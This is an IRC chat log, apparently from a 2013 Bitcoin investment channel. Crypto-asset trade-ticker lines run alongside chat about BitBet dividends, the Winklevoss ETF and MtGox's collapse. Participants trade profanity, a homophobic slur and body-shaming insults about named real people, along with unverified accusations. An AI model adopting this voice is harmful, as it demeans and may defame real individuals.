21:10:52 i thought the theory was am and btc/usd move in tandem Jul 03 21:11:00 nah Jul 03 21:11:10 it's all temporary reactions Jul 03 21:11:13 blips Jul 03 21:11:25 so maybe we break 90 and am goes to 2.x ? Jul 03 21:11:44 that would be in kind with my view Jul 03 21:11:48 not thos eexact numbers Jul 03 21:11:50 but yes Jul 03 21:11:59 [BTCTC] [ASICMINER-PT] 6 @ 4.559997 = 27.36 BTC [-] Jul 03 21:12:00 [BTCTC] [TAT.ASICMINER] 15 @ 0.045 = 0.675 BTC [+] Jul 03 21:12:55 there are always holders looking for reasons to sell Jul 03 21:13:11 any notable movement in BTCUSD can cause it Jul 03 21:13:17 [BTCTC] [ASICMINER-PT] 1 @ 4.559998 BTC [+] Jul 03 21:13:19 a move up will have slower reactions Jul 03 21:13:23 but deeper Jul 03 21:13:28 [BTCTC] [ASICMINER-PT] 1 @ 4.564999 BTC [+] Jul 03 21:13:34 [BTCTC] [ASICMINER-PT] 1 @ 4.565 BTC [+] Jul 03 21:13:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.045 = 0.09 BTC [+] Jul 03 21:13:41 a move down faster reactions, but shallower Jul 03 21:13:49 [BTCTC] [TAT.ASICMINER] 15 @ 0.045 = 0.675 BTC [+] Jul 03 21:13:55 [BTCTC] [TAT.ASICMINER] 3 @ 0.045 = 0.135 BTC [+] Jul 03 21:14:23 [BTCTC] [TAT.ASICMINER] 61 @ 0.045 = 2.745 BTC [+] Jul 03 21:15:43 the trick of course is that money can be made on movement in any directions Jul 03 21:16:27 now Friedcat will announce something wonderful to get us back to 5 Jul 03 21:16:37 assuming BTCUSD lets it Jul 03 21:17:28 meanwhile Havelock was offline for the whole thing Jul 03 21:17:29 heh Jul 03 21:17:40 [BTCTC] [BFMINES] 1 @ 0.004 BTC Jul 03 21:17:42 [BTCTC] [BFMINES] 1000 @ 0.004 = 4 BTC Jul 03 21:17:44 [BTCTC] [BFMINES] 30 @ 0.004 = 0.12 BTC Jul 03 21:17:45 [BTCTC] [BFMINES] 50 @ 0.004 = 0.2 BTC Jul 03 21:17:46 [BTCTC] [BFMINES] 25 @ 0.004 = 0.1 BTC Jul 03 21:17:51 insider trading! Jul 03 21:17:53 [BTCTC] [BFMINES] 50 @ 0.004 = 0.2 BTC Jul 03 21:17:54 [BTCTC] [BFMINES] 145 @ 0.004 = 0.58 BTC Jul 03 21:17:58 [BTCTC] [BFMINES] 3000 @ 0.004 = 12 BTC Jul 03 21:18:00 [BTCTC] [BFMINES] 500 @ 0.004 = 2 BTC Jul 03 21:18:01 [BTCTC] [BFMINES] 92 @ 0.004 = 0.368 BTC Jul 03 21:18:04 [BTCTC] [BFMINES] 5 @ 0.004 = 0.02 BTC Jul 03 21:18:04 [BTCTC] [BFMINES] 10 @ 0.004 = 0.04 BTC Jul 03 21:18:05 [BTCTC] [BFMINES] 10 @ 0.004 = 0.04 BTC Jul 03 21:18:07 [BTCTC] [BFMINES] 8 @ 0.004 = 0.032 BTC Jul 03 21:18:11 [BTCTC] [BFMINES] 40 @ 0.004 = 0.16 BTC Jul 03 21:18:14 [BTCTC] [BFMINES] 1 @ 0.004 BTC Jul 03 21:18:15 [BTCTC] [BFMINES] 3 @ 0.004 = 0.012 BTC Jul 03 21:18:17 hi guys anywhere to see the bitbet statement? Jul 03 21:18:17 [BTCTC] [BFMINES] 20 @ 0.004 = 0.08 BTC Jul 03 21:18:20 [BTCTC] [BFMINES] 2 @ 0.004 = 0.008 BTC Jul 03 21:18:22 [BTCTC] [BFMINES] 2 @ 0.004 = 0.008 BTC Jul 03 21:18:23 [BTCTC] [BFMINES] 5000 @ 0.004 = 20 BTC Jul 03 21:18:24 [BTCTC] [BFMINES] 906 @ 0.004 = 3.624 BTC Jul 03 21:18:26 [BTCTC] [BFMINES] 1 @ 0.004 BTC Jul 03 21:18:27 [BTCTC] [BFMINES] 25 @ 0.004 = 0.1 BTC Jul 03 21:18:28 [BTCTC] [BFMINES] 15 @ 0.004 = 0.06 BTC Jul 03 21:18:28 [BTCTC] [BFMINES] 15 @ 0.004 = 0.06 BTC Jul 03 21:18:30 [BTCTC] [BFMINES] 50 @ 0.004 = 0.2 BTC Jul 03 21:18:31 has it been posted on the trilema Jul 03 21:18:31 [BTCTC] [BFMINES] 1 @ 0.004 BTC Jul 03 21:18:32 [BTCTC] [BFMINES] 3 @ 0.004 = 0.012 BTC Jul 03 21:18:33 [BTCTC] [BFMINES] 320 @ 0.004 = 1.28 BTC Jul 03 21:19:40 whoa, lots of people wanting to lose money on a PMB? Jul 03 21:19:52 whats a PMB Jul 03 21:20:08 perpetual mining bond - BFMINES today Jul 03 21:20:21 dont be fooled Jul 03 21:20:24 90% of those buys are the issuer Jul 03 21:20:58 [BTCTC] [ASICMINER-PT] 1 @ 4.74 BTC [+] Jul 03 21:21:00 sounds like mircea popescu Jul 03 21:21:01 he bought like 10000 and customers bought 1000 or so, i havent bothered to add up the real stats yet Jul 03 21:21:04 lol Jul 03 21:21:13 another shitty dividend for bitbet Jul 03 21:21:27 did you expect magic? Jul 03 21:21:33 [BTCTC] [ASICMINER-PT] 3 @ 4.575001 = 13.725 BTC [-] Jul 03 21:21:34 [BTCTC] [AMC-PT] 100 @ 0.0022 = 0.22 BTC [-] Jul 03 21:21:38 [BTCTC] [ASICMINER-PT] 5 @ 4.575 = 22.875 BTC [-] Jul 03 21:21:43 [BTCTC] [ASICMINER-PT] 5 @ 4.56789 = 22.8395 BTC [-] Jul 03 21:21:58 [BTCTC] [ASICMINER-PT] 1 @ 4.56789 BTC [-] Jul 03 21:21:58 expected some shareholder value from someone with a mouth like mircea's Jul 03 21:22:14 [BTCTC] [ASICMINER-PT] 1 @ 4.56789 BTC [-] Jul 03 21:22:29 oh geez, i wonder how many minutes you have left in here Jul 03 21:22:30 does bitbet do any advertising to drum up traffic? Jul 03 21:22:35 no Jul 03 21:22:49 [BTCTC] [ASICMINER-PT] 4 @ 4.56789 = 18.2716 BTC [-] Jul 03 21:23:42 bitcoinbust http://trilema.com/2013/bitbet-june-2013-statement/ Jul 03 21:23:47 do you have trouble finding things there ? Jul 03 21:24:18 peterl there's an affiliate system, which works by simply adding tyour btc addy to the link Jul 03 21:24:47 people aren't using it at its full potential however, which makes me suspect they are in fact using it at THEIR full potential, Jul 03 21:24:53 which just happens to be rather small. Jul 03 21:25:52 How much do you get for referals? Jul 03 21:26:16 [BTCTC] [BASIC-MINING] 6 @ 0.180001 = 1.08 BTC [-] Jul 03 21:26:18 the site's rake for one month Jul 03 21:26:19 [BTCTC] [BASIC-MINING] 1 @ 0.18 BTC [-] Jul 03 21:27:07 Could I add a link as my forum signature? Jul 03 21:27:20 yup Jul 03 21:27:26 [BTCTC] [BASIC-MINING] 7 @ 0.1756 = 1.2292 BTC [-] Jul 03 21:27:37 afaik the girl actually uses a reflink on bitbet links on there Jul 03 21:27:49 [BTCTC] [TAT.ASICMINER] 12 @ 0.048878 = 0.5865 BTC [+] Jul 03 21:27:59 cool, I will give take a look at hers to see how she sets it up Jul 03 21:28:07 you just go ?ref=1addy Jul 03 21:28:18 http://bitbet.us/faq/#43 Jul 03 21:28:23 FAQ BitBet Jul 03 21:29:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.048878 = 0.2444 BTC [+] Jul 03 21:30:00 [BTCTC] [BASIC-MINING] 2 @ 0.1756 = 0.3512 BTC [-] Jul 03 21:31:52 What's the old MPEx key ID? Jul 03 21:32:14 mircea: how come it says 8.8btc as dividends and on mpex its like 2btc Jul 03 21:32:30 [BTCTC] [ASICMINER-PT] 3 @ 4.600001 = 13.8 BTC [+] Jul 03 21:32:37 2.64061223 BTC on 03-07-13 Jul 03 21:32:45 90% of those buys are the issuer <- No, my sales are being pushed directly (to avoind trading fee) so not part of the IPO sales Jul 03 21:32:50 Profit : 8.80204166 BTC to be distributed as dividends. Jul 03 21:32:56 Because not all shares are issued on MPEx... Jul 03 21:33:04 ah i see Jul 03 21:33:08 Just a portion... Jul 03 21:33:08 apologies Jul 03 21:33:12 i guess Jul 03 21:33:20 namworld who are you talking too Jul 03 21:33:20 [BTCTC] [ASICMINER-PT] 4 @ 4.610001 = 18.44 BTC [+] Jul 03 21:33:24 [BTCTC] [ASICMINER-PT] 1 @ 4.61 BTC [-] Jul 03 21:33:46 You I guess? Who else? Jul 03 21:34:03 [BTCTC] [ASICMINER-PT] 1 @ 4.61 BTC [-] Jul 03 21:34:04 There is also one pledge of around 60BTC where the buyer wanted to keep his funds in AM until dividends today. Jul 03 21:34:14 Namworld, was talking to furknap Jul 03 21:35:05 bitcoin business has really stagnated in the last 60 days Jul 03 21:35:09 I was replying to bitcoinbust... what the hell? Never talked to you. Jul 03 21:35:20 [MPEX] [S.MPOE] 4500 @ 0.00078532 = 3.5339 BTC [+] Jul 03 21:35:33 Stagnated? Seems as usual, with crazy ROIs Jul 03 21:35:51 [BTCTC] [ASICMINER-PT] 3 @ 4.61 = 13.83 BTC [-] Jul 03 21:35:51 bitbet shit statement 2 months in a row Jul 03 21:36:15 [BTCTC] [ASICMINER-PT] 1 @ 4.599004 BTC [-] Jul 03 21:36:19 kakobrekla with his big mouth all over the forums instead of advertising his business Jul 03 21:36:55 bitcoinbust = BronxJoe ow whatever Jul 03 21:37:03 = some troll i ignored a while ago Jul 03 21:37:09 dunno which name Jul 03 21:37:18 pronly tiberslav Jul 03 21:37:23 [BTCTC] [ASICMINER-PT] 5 @ 3.55 = 17.75 BTC [-] Jul 03 21:37:24 [BTCTC] [AMC-PT] 306 @ 0.00235 = 0.7191 BTC [+] Jul 03 21:37:40 [BTCTC] [ASICMINER-PT] 2 @ 4.599 = 9.198 BTC [+] Jul 03 21:37:42 [BTCTC] [BASIC-MINING] 2 @ 0.168 = 0.336 BTC [-] Jul 03 21:37:52 basically, you should put him on ignore Jul 03 21:38:53 just asking about a discrepency Jul 03 21:38:57 but yea you are going on ignore. Jul 03 21:39:11 [BTCTC] [ASICMINER-PT] 1 @ 4.599 BTC [+] Jul 03 21:39:16 [BTCTC] [ASICMINER-PT] 1 @ 4.599004 BTC [+] Jul 03 21:39:42 bitcoinbust> mircea: how come it says 8.8btc as dividends and on mpex its like 2btc << 3mn shares are on mpex, as part of ipo Jul 03 21:39:47 once that sells the owners get the rest Jul 03 21:39:59 [BTCTC] [TAT.ASICMINER] 11 @ 0.04849 = 0.5334 BTC [-] Jul 03 21:40:00 [BTCTC] [ASICMINER-PT] 5 @ 4.559998 = 22.8 BTC [-] Jul 03 21:40:14 [BTCTC] [ASICMINER-PT] 1 @ 4.559998 BTC [-] Jul 03 21:40:28 [BTCTC] [ASICMINER-PT] 1 @ 4.559998 BTC [-] Jul 03 21:40:37 [BTCTC] [ASICMINER-PT] 1 @ 4.43 BTC [-] Jul 03 21:40:44 [BTCTC] [ASICMINER-PT] 19 @ 4.425 = 84.075 BTC [-] Jul 03 21:40:54 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [-] Jul 03 21:40:59 [BTCTC] [ASICMINER-PT] 3 @ 4.41 = 13.23 BTC [-] Jul 03 21:41:13 Well I don't know. Profits can vary wildly from month to month based on usage. Jul 03 21:41:16 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [-] Jul 03 21:41:46 [BTCTC] [ASICMINER-PT] 2 @ 4.378887 = 8.7578 BTC [-] Jul 03 21:41:53 [BTCTC] [ASICMINER-PT] 1 @ 4.37 BTC [-] Jul 03 21:41:57 [BTCTC] [ASICMINER-PT] 1 @ 4.331 BTC [-] Jul 03 21:42:16 [BTCTC] [ASICMINER-PT] 1 @ 4.33 BTC [-] Jul 03 21:42:18 [BTCTC] [TAT.ASICMINER] 11 @ 0.0465 = 0.5115 BTC [-] Jul 03 21:42:21 [BTCTC] [ASICMINER-PT] 3 @ 4.33 = 12.99 BTC [-] Jul 03 21:42:31 [BTCTC] [ASICMINER-PT] 8 @ 4.32 = 34.56 BTC [-] Jul 03 21:42:54 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [+] Jul 03 21:42:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.046102 = 0.461 BTC [-] Jul 03 21:43:02 [BTCTC] [TAT.ASICMINER] 39 @ 0.046102 = 1.798 BTC [-] Jul 03 21:43:05 [BTCTC] [TAT.ASICMINER] 25 @ 0.046101 = 1.1525 BTC [-] Jul 03 21:43:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [-] Jul 03 21:43:15 [BTCTC] [AMC-PT] 109 @ 0.002135 = 0.2327 BTC [-] Jul 03 21:43:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [-] Jul 03 21:43:19 [BTCTC] [AMC-PT] 230 @ 0.002127 = 0.4892 BTC [-] Jul 03 21:43:22 [BTCTC] [AMC-PT] 100 @ 0.002127 = 0.2127 BTC [-] Jul 03 21:43:22 [BTCTC] [TAT.ASICMINER] 5 @ 0.045 = 0.225 BTC [-] Jul 03 21:43:27 [BTCTC] [AMC-PT] 1500 @ 0.002126 = 3.189 BTC [-] Jul 03 21:43:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.044501 = 0.445 BTC [-] Jul 03 21:43:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.044 = 0.44 BTC [-] Jul 03 21:43:50 [BTCTC] [BFMINES] 100 @ 0.004 = 0.4 BTC Jul 03 21:43:59 [BTCTC] [TAT.ASICMINER] 15 @ 0.044 = 0.66 BTC [-] Jul 03 21:44:30 [BTCTC] [ASICMINER-PT] 3 @ 4.41 = 13.23 BTC [+] Jul 03 21:44:31 [BTCTC] [BITVPS] 1 @ 0.002899 BTC [+] Jul 03 21:44:34 [MPEX] [S.MPOE] 7400 @ 0.00078532 = 5.8114 BTC [+] Jul 03 21:44:36 [MPEX] [S.MPOE] 9100 @ 0.00078602 = 7.1528 BTC [+] Jul 03 21:44:40 anyone with an IQ of over 100 care to comment about the recent price action Jul 03 21:44:55 My iq is only 40, sorry Jul 03 21:45:26 seems to be a decline on low volume Jul 03 21:45:32 [BTCTC] [TAT.ASICMINER] 11 @ 0.04399 = 0.4839 BTC [-] Jul 03 21:45:49 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [+] Jul 03 21:46:03 [BTCTC] [ASICMINER-PT] 1 @ 4.56999 BTC [+] Jul 03 21:46:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.04399 = 0.132 BTC [-] Jul 03 21:47:13 out of curiosity, does anybody here ever click on links in forum signatures? Jul 03 21:47:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.048305 = 0.0966 BTC [+] Jul 03 21:47:44 mircea_popescu: id like to hear your comments about the winklevoss ETF Jul 03 21:47:45 I hope so, my site is in mine Jul 03 21:47:55 [BTCTC] [AMC-PT] 100 @ 0.002325 = 0.2325 BTC [+] Jul 03 21:47:56 [BTCTC] [ASICMINER-PT] 1 @ 4.40001 BTC [-] Jul 03 21:48:01 [BTCTC] [AMC-PT] 190 @ 0.00235 = 0.4465 BTC [+] Jul 03 21:48:26 bitcoinbust you missed them yest, do you know how to check th chan archive ? Jul 03 21:48:53 [BTCTC] [AMC-PT] 27 @ 0.00235 = 0.0635 BTC [+] Jul 03 21:49:31 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [+] Jul 03 21:49:40 no Jul 03 21:49:43 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [-] Jul 03 21:49:49 [BTCTC] [ASICMINER-PT] 1 @ 3.2 BTC [-] Jul 03 21:49:54 [BTCTC] [BITVPS] 1 @ 0.0025 BTC [-] Jul 03 21:49:54 https://bitcointalk.org/index.php?topic=248922.0 Jul 03 21:49:58 How to short ASICMINER???? Jul 03 21:49:59 anyone has solutions for the guy ? Jul 03 21:50:00 i didnt see a posting on the trilema website about comments from the maniac known as mircea Jul 03 21:50:07 bitcoinbust log.bitcoin-assets.com Jul 03 21:50:18 [BTCTC] [AMC-PT] 4 @ 0.00235 = 0.0094 BTC [+] Jul 03 21:50:18 i was looking forward for an article on the website Jul 03 21:50:19 [BTCTC] [AMC-PT] 120 @ 0.002125 = 0.255 BTC [-] Jul 03 21:50:20 [BTCTC] [AMC-PT] 80 @ 0.002 = 0.16 BTC [-] Jul 03 21:50:44 [BTCTC] [TAT.ASICMINER] 7 @ 0.046 = 0.322 BTC [-] Jul 03 21:50:54 havelock update: ddos sucks Jul 03 21:50:57 [BTCTC] [ASICMINER-PT] 1 @ 4.263 BTC [+] Jul 03 21:51:05 [BTCTC] [ASICMINER-PT] 1 @ 4.263 BTC [+] Jul 03 21:51:16 search function? Jul 03 21:51:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [-] Jul 03 21:51:30 :( Jul 03 21:51:48 topace_ start proxying. Jul 03 21:52:10 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [+] Jul 03 21:52:25 mircea: using the winklevoss term theres barely any comments from yesterday Jul 03 21:52:32 other then someone commenting on the busting of mpex Jul 03 21:52:37 [BTCTC] [TAT.ASICMINER] 9 @ 0.046 = 0.414 BTC [-] Jul 03 21:52:43 can you tell me a date to search please? Jul 03 21:52:45 [BTCTC] [TAT.ASICMINER] 7 @ 0.0451 = 0.3157 BTC [-] Jul 03 21:52:50 bitcoinbust http://log.bitcoin-assets.com/?date=01-07-2013#114796 Jul 03 21:52:54 you just press ctrl-f eh ? Jul 03 21:53:04 what if the winklevii are pirateat40 Jul 03 21:53:11 [BTCTC] [TAT.ASICMINER] 7 @ 0.045 = 0.315 BTC [-] Jul 03 21:53:11 jcpham no cause there's two of them Jul 03 21:53:16 [BTCTC] [TAT.ASICMINER] 19 @ 0.046 = 0.874 BTC [+] Jul 03 21:53:25 your logic is airtight Jul 03 21:53:26 [BTCTC] [AMC-PT] 50 @ 0.002325 = 0.1163 BTC [+] Jul 03 21:53:52 how could two people who are identical share the same online identity Jul 03 21:53:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [+] Jul 03 21:53:58 real or otherwise? Jul 03 21:54:01 the winklevoss etf makes it easier to speculate on btc Jul 03 21:54:11 and hedge if it ever sees the light of day Jul 03 21:54:11 good luck with that Jul 03 21:54:33 allows you to use thousands of brokers vs being stuck with shitty mtgox Jul 03 21:54:33 [BTCTC] [TAT.ASICMINER] 20 @ 0.0275 = 0.55 BTC [-] Jul 03 21:54:43 in theory it's a good idea. Jul 03 21:54:50 the winklevii themselves can take us to $1 coins if they want Jul 03 21:54:51 the implementation looks exactly like winkleppl did it. Jul 03 21:55:00 jcpham no they cant. Jul 03 21:55:05 winkles are tied up now Jul 03 21:55:11 jcpham they can't, as there's 10mn coins they;'d have to sell and i can buy over 1. Jul 03 21:55:11 [BTCTC] [BFMINES] 10 @ 0.004 = 0.04 BTC Jul 03 21:55:12 with their SEC filing Jul 03 21:55:18 if they sold they would sell at huge losses to themselves Jul 03 21:55:18 oh yeah Jul 03 21:55:38 um no they arent thickasthieves. Jul 03 21:55:42 i forgot they just did that and we were talking about it Jul 03 21:55:48 carry on Jul 03 21:55:49 the SEC filings are stupid government beurocracy Jul 03 21:56:02 you have to do it to list on a major exchange. Jul 03 21:56:11 it'll be awhile before that see the light of day if ever Jul 03 21:56:23 its a better alternative to risking money on mtgox Jul 03 21:56:30 gonna be hard with legal challenges being tossed around in california already Jul 03 21:56:39 there arent any legal challenges in california Jul 03 21:56:48 its a better alternative to risking money on mtgox // s/risking/saying goodbye to Jul 03 21:56:49 bitcoin foundation just threw down the gauntlet to the US Jul 03 21:56:50 [BTCTC] [TAT.ASICMINER] 22 @ 0.045489 = 1.0008 BTC [+] Jul 03 21:56:51 https://bitcointalk.org/index.php?topic=249182.0 Jul 03 21:56:55 Someone is using my picture of Avalon on eBay Jul 03 21:57:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.04549 = 0.091 BTC [+] Jul 03 21:57:06 california is a preeeety big state with a lot of pull in Murica Jul 03 21:57:07 [BTCTC] [TAT.ASICMINER] 5 @ 0.04549 = 0.2275 BTC [+] Jul 03 21:57:07 jcpham: the btc foundation doesnt actually do anything. Jul 03 21:57:18 i know that Jul 03 21:57:22 the government sent them a generic letter as they themselves had no idea what bitcoin is Jul 03 21:57:22 Apocalyptic https://bitcointalk.org/index.php?topic=173433.0 Jul 03 21:57:25 and they sent a big fuck you letter to california Jul 03 21:57:27 never cross an angry amazon Jul 03 21:57:28 they thought the btc foundation is trading bitcoins Jul 03 21:57:34 and they sent a big fuck you letter to california Jul 03 21:57:43 [BTCTC] [ASICMINER-PT] 1 @ 4.36 BTC [+] Jul 03 21:57:51 they didnt do anything but waste money on lawyers Jul 03 21:57:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.04549 = 0.091 BTC [+] Jul 03 21:57:57 they should have sent no letter Jul 03 21:57:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.04549 = 0.2275 BTC [+] Jul 03 21:58:03 [BTCTC] [AMC-PT] 39 @ 0.002325 = 0.0907 BTC [+] Jul 03 21:58:07 [BTCTC] [ASICMINER-PT] 1 @ 4.351 BTC [-] Jul 03 21:58:19 the response not only challeged the percieved law it challenged what constitutes money itself Jul 03 21:58:23 in a legal sense Jul 03 21:58:23 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004376 = 0.0088 BTC [+] Jul 03 21:58:31 no it didnt Jul 03 21:58:44 [BTCTC] [ASICMINER-PT] 1 @ 4.31 BTC [-] Jul 03 21:58:52 [BTCTC] [ASICMINER-PT] 2 @ 4.3 = 8.6 BTC [-] Jul 03 21:58:59 mircea_popescu, a sensible statement Jul 03 21:58:59 2 idiotic agencies sending lawyer speak amongst themselves. Jul 03 21:59:01 [BTCTC] [ASICMINER-PT] 5 @ 4.267 = 21.335 BTC [-] Jul 03 21:59:07 [BTCTC] [ASICMINER-PT] 2 @ 4.2651 = 8.5302 BTC [-] Jul 03 21:59:26 [BTCTC] [AMC-PT] 10 @ 0.002325 = 0.0233 BTC [+] Jul 03 21:59:30 [BTCTC] [AMC-PT] 1 @ 0.002325 BTC [+] Jul 03 21:59:32 [BTCTC] [AMC-PT] 9 @ 0.002325 = 0.0209 BTC [+] Jul 03 21:59:32 mircea_popescu: hence why the bitcoin etf is not a bad idea. Jul 03 21:59:37 jcpham sorry, blogposts don't actually have the power to do that. Jul 03 21:59:46 lol exactly Jul 03 21:59:51 bitcoinbust it is a great idea, and a quite obvious one Jul 03 22:00:08 the problem is that two dumb jocks are trying to pull a mega on it. Jul 03 22:00:08 of course in a perfect world there wouldnt be SEC bs but we dont live in one. Jul 03 22:00:38 [BTCTC] [AMC-PT] 20 @ 0.002325 = 0.0465 BTC [+] Jul 03 22:00:39 [BTCTC] [ASICMINER-PT] 1 @ 4.2651 BTC [-] Jul 03 22:00:42 well those guys are believers in the system Jul 03 22:00:43 wherein "to pull a mega" on something is to pretend like you're working on something strictly dfor the image benefit your fat useless self imagines can thus be derived. Jul 03 22:00:58 named in loving memort of that german fat fuck. Jul 03 22:00:58 [BTCTC] [TAT.ASICMINER] 16 @ 0.04399 = 0.7038 BTC [-] Jul 03 22:01:11 kimble Jul 03 22:01:16 [BTCTC] [AMC-PT] 19 @ 0.002325 = 0.0442 BTC [+] Jul 03 22:01:23 [BTCTC] [TAT.ASICMINER] 22 @ 0.04399 = 0.9678 BTC [-] Jul 03 22:01:23 right. so i have little faith this is going to go anywhere, Jul 03 22:01:26 a friend of mine knew kimble from his street racing days Jul 03 22:01:38 once the "look ma, i'm being interviewed" juice has been squeezed. Jul 03 22:01:41 [BTCTC] [AMC-PT] 10 @ 0.002325 = 0.0233 BTC [+] Jul 03 22:01:49 [BTCTC] [TAT.ASICMINER] 12 @ 0.0435 = 0.522 BTC [-] Jul 03 22:01:54 a bitcoin etf would kill mtgox though Jul 03 22:02:21 [MPEX] [S.MPOE] 5281 @ 0.00078225 = 4.1311 BTC [-] Jul 03 22:02:25 take the heat off the other exchanges and they can deal with transactional users Jul 03 22:02:28 [BTCTC] [ASICMINER-PT] 2 @ 4.2651 = 8.5302 BTC [-] Jul 03 22:02:30 i doubt that, as mtgox needs little more killing anyway Jul 03 22:02:41 prolly be dead before you can get an etf through the works. Jul 03 22:02:42 how? speculative volumes would leave mtgox Jul 03 22:02:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.0438 = 0.0876 BTC [+] Jul 03 22:02:53 [BTCTC] [TAT.ASICMINER] 6 @ 0.0435 = 0.261 BTC [-] Jul 03 22:02:54 but mtgox is already dying and the price reflects it? Jul 03 22:03:05 how does the bitcoin price reflect mtgox? Jul 03 22:03:11 that doesnt even make any sense. Jul 03 22:03:22 [BTCTC] [ASICMINER-PT] 4 @ 4.2651 = 17.0604 BTC [-] Jul 03 22:03:22 smh Jul 03 22:03:33 when the fuck did mtgox become bitcoin? Jul 03 22:03:39 i must have missed that boat Jul 03 22:03:52 [BTCTC] [TAT.ASICMINER] 15 @ 0.0434 = 0.651 BTC [-] Jul 03 22:03:57 must have. Jul 03 22:04:11 jcpham: mtgox has been losing market share while bitcoin has appreciated. Jul 03 22:04:29 [BTCTC] [ASICMINER-PT] 1 @ 4.2653 BTC [+] Jul 03 22:04:30 jcpham: please dont comment anymore thank you Jul 03 22:04:31 [BTCTC] [TAT.ASICMINER] 8 @ 0.0435 = 0.348 BTC [+] Jul 03 22:04:40 yeah dude i don't like you either Jul 03 22:04:41 get fucked Jul 03 22:04:41 mircea_popescu: i agree the twins are idiots Jul 03 22:04:49 [BTCTC] [ASICMINER-PT] 1 @ 4.399999 BTC [+] Jul 03 22:04:50 [BTCTC] [DMS.MINING] 2 @ 0.020897 = 0.0418 BTC [-] Jul 03 22:04:50 wait, josh managed to troll someone ? Jul 03 22:04:52 fucking finally Jul 03 22:04:55 [BTCTC] [AMC-PT] 25 @ 0.002325 = 0.0581 BTC [+] Jul 03 22:04:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.0435 BTC [+] Jul 03 22:04:59 [BTCTC] [ASICMINER-PT] 1 @ 4.39 BTC [-] Jul 03 22:05:12 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Jul 03 22:05:18 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [+] Jul 03 22:05:26 [BTCTC] [ASICMINER-PT] 2 @ 4.479998 = 8.96 BTC [+] Jul 03 22:05:27 slow clap Jul 03 22:05:31 [BTCTC] [ASICMINER-PT] 1 @ 4.4899 BTC [+] Jul 03 22:05:32 [BTCTC] [TAT.ASICMINER] 9 @ 0.043009 = 0.3871 BTC [-] Jul 03 22:05:43 it's been what ? a year ? two ? Jul 03 22:05:54 that was earned man. Jul 03 22:06:02 anyone notice the european bitcoin conference seemed much more professional then the dog and pony show in america? Jul 03 22:06:08 [BTCTC] [BFMINES] 1 @ 0.004 BTC Jul 03 22:06:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.0435 = 0.1305 BTC [+] Jul 03 22:06:18 um. which one is this ? Jul 03 22:06:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.0435 = 0.087 BTC [+] Jul 03 22:06:23 the london one Jul 03 22:06:40 i've not really watched either, but no such report reached me, no. Jul 03 22:06:59 what's the criteria for professional ? Jul 03 22:07:08 well id say asthetically at least lol Jul 03 22:07:19 it wasnt potheads on podiums Jul 03 22:07:44 twas crackwhores on chairs Jul 03 22:07:51 [BTCTC] [PAJKA.BOND] 1 @ 0.058 BTC [+] Jul 03 22:08:01 a ok Jul 03 22:08:08 i prefer crackhos to potheds too. Jul 03 22:08:17 [BTCTC] [PAJKA.BOND] 2 @ 0.057 = 0.114 BTC [-] Jul 03 22:08:28 [BTCTC] [TAT.ASICMINER] 8 @ 0.04515 = 0.3612 BTC [+] Jul 03 22:08:33 im confused to what peter vessenes does? is he a bitcoin developer? Jul 03 22:08:55 saw him on a bunch of panels on the youtube vids Jul 03 22:09:07 seemed like a creepy limp wristed homosexual Jul 03 22:09:07 he's the guy that came up with the idea of making a "foundation" Jul 03 22:09:14 of which he could be the president and treasurer Jul 03 22:09:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.045399 BTC [+] Jul 03 22:09:29 but was he one of the initial developers? Jul 03 22:09:32 and then could use whatever bitcoin idiots sent to pretend like his failed coin* "venture" isn't quite as failed. Jul 03 22:09:37 noneof this worked, but he won't relent. Jul 03 22:09:50 fuck mt gox. Jul 03 22:09:51 much like taaki, last year. Jul 03 22:09:52 that is all Jul 03 22:09:58 lol Jul 03 22:10:02 now what Jul 03 22:10:10 you must have msised teh conference where its demise was announced Bugpowder. Jul 03 22:10:31 but let's not despair. perhaps they eventually pay. Jul 03 22:10:32 :( Jul 03 22:10:44 [BTCTC] [BASIC-MINING] 1 @ 0.175599 BTC [+] Jul 03 22:10:50 I had my wires sent 2 days before the suspension Jul 03 22:10:55 they never got sent :( Jul 03 22:11:04 because their money is locked in the US Jul 03 22:11:07 money launderer! Jul 03 22:11:17 how far will bitcoin fall Jul 03 22:11:17 [BTCTC] [AMC-PT] 54 @ 0.002125 = 0.1148 BTC [-] Jul 03 22:11:18 they became insolvent when the dwolla accounts got seized Jul 03 22:11:20 [BTCTC] [AMC-PT] 43 @ 0.002125 = 0.0914 BTC [-] Jul 03 22:11:22 before we recover Jul 03 22:11:24 [BTCTC] [AMC-PT] 21 @ 0.002125 = 0.0446 BTC [-] Jul 03 22:11:29 [BTCTC] [AMC-PT] 11 @ 0.002125 = 0.0234 BTC [-] Jul 03 22:11:31 [BTCTC] [AMC-PT] 31 @ 0.002125 = 0.0659 BTC [-] Jul 03 22:11:31 bugpowder its selling on low volume Jul 03 22:11:35 Coroporate Espionager! Jul 03 22:11:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.045399 = 0.1816 BTC [+] Jul 03 22:11:40 can bounce any day Jul 03 22:11:43 Success Victimizer! 